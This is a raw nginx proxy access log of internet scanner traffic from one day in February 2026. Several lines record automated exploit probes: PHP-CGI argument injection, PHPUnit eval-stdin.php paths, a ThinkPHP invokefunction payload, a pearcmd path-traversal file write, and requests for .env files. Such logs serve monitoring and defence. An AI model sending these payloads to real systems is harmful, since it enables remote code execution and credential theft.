"Mozilla/5.0" "-" -[15/Feb/2026:06:37:02 +0000] 200 - GET http 222.117.41.51 "/" [Client 199.45.155.90] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[15/Feb/2026:06:37:03 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.90] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:06:37:04 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[15/Feb/2026:06:37:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.90] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:06:37:11 +0000] 404 - GET http 222.117.41.51 "/security.txt" [Client 199.45.155.90] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[15/Feb/2026:06:37:16 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.90] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:06:42:44 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 45.91.64.6] [Length 1033] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; ZE520KL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36" "-" -[15/Feb/2026:06:43:28 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.215.0.144] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:06:43:29 +0000] 404 - GET http 222.117.41.51 "/aaa9" [Client 95.215.0.144] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" -[15/Feb/2026:06:43:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.215.0.144] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:06:43:30 +0000] 404 - GET http 222.117.41.51 "/aab9" [Client 95.215.0.144] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" -[15/Feb/2026:06:43:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:06:47:22 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:06:49:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:06:55:03 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:07:01:06 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.167.232.38] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:07:22:17 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:07:32:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.185.132.97] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:07:32:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.185.132.97] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:07:34:35 +0000] 404 - GET http 222.117.41.51 "/developmentserver/metadatauploader" [Client 20.80.105.83] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" -[15/Feb/2026:07:41:27 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[15/Feb/2026:07:42:53 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:07:48:01 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:07:48:54 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:08:11:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:08:12:29 +0000] 404 - GET http 222.117.41.51 "/cgi-bin/luci/" [Client 87.120.191.81] [Length 150] [Gzip -] "-" "-" -[15/Feb/2026:08:30:05 +0000] 200 - GET http 222.117.41.51 "/" [Client 212.132.127.66] [Length 1033] [Gzip -] "-" "-" -[15/Feb/2026:08:37:36 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:08:38:05 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:08:46:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:08:46:50 +0000] 400 - - http localhost "-" [Client 20.65.195.96] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:08:55:12 +0000] 200 - GET http 222.117.41.51 "/" [Client 195.3.221.86] [Length 1033] [Gzip -] "-" "-" -[15/Feb/2026:09:02:33 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:09:06:05 +0000] 200 - GET http 222.117.41.51 "/" [Client 195.3.221.86] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0" "-" -[15/Feb/2026:09:30:00 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[15/Feb/2026:09:30:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:09:30:47 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:09:39:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:09:44:27 +0000] 200 - GET http 222.117.41.51 "/" [Client 130.12.180.151] [Length 1033] [Gzip -] "Hello World" "-" -[15/Feb/2026:09:54:15 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:10:21:57 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:10:22:30 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[15/Feb/2026:10:32:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:10:35:34 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:10:39:21 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 103.40.61.98] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:10:39:21 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 103.40.61.98] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:10:39:21 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:21 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 103.40.61.98] [Length 154] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:22 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:22 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:22 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:22 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:22 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:22 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:23 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:23 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:23 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:23 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:23 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:23 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:23 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:24 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:24 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:24 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:24 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:24 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:24 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:24 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:25 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:25 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:25 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:25 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:25 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:25 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:26 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:26 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:26 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:26 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:26 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:26 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:26 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:27 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:27 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:27 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:27 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:27 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:27 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:27 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:28 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:39:28 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:10:46:55 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:11:11:57 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:11:12:34 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[15/Feb/2026:11:25:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:11:34:23 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:11:35:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:11:47:21 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:12:02:53 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:12:20:07 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:12:24:50 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:12:26:07 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[15/Feb/2026:12:26:08 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[15/Feb/2026:12:26:09 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:12:26:09 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[15/Feb/2026:12:26:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:12:30:09 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:12:36:44 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 20.59.121.110] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:12:36:45 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 20.59.121.110] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:12:36:46 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:36:47 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 20.59.121.110] [Length 154] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:36:48 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:36:49 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:36:50 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:36:51 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:36:52 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:36:54 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:36:55 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:36:56 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:36:57 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:36:58 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:36:59 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:01 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:02 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:03 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:04 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:05 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:06 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:07 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:09 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:10 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:11 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 20.59.121.110] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:12:37:12 +0000] 404 - GET http 222.117.41.51 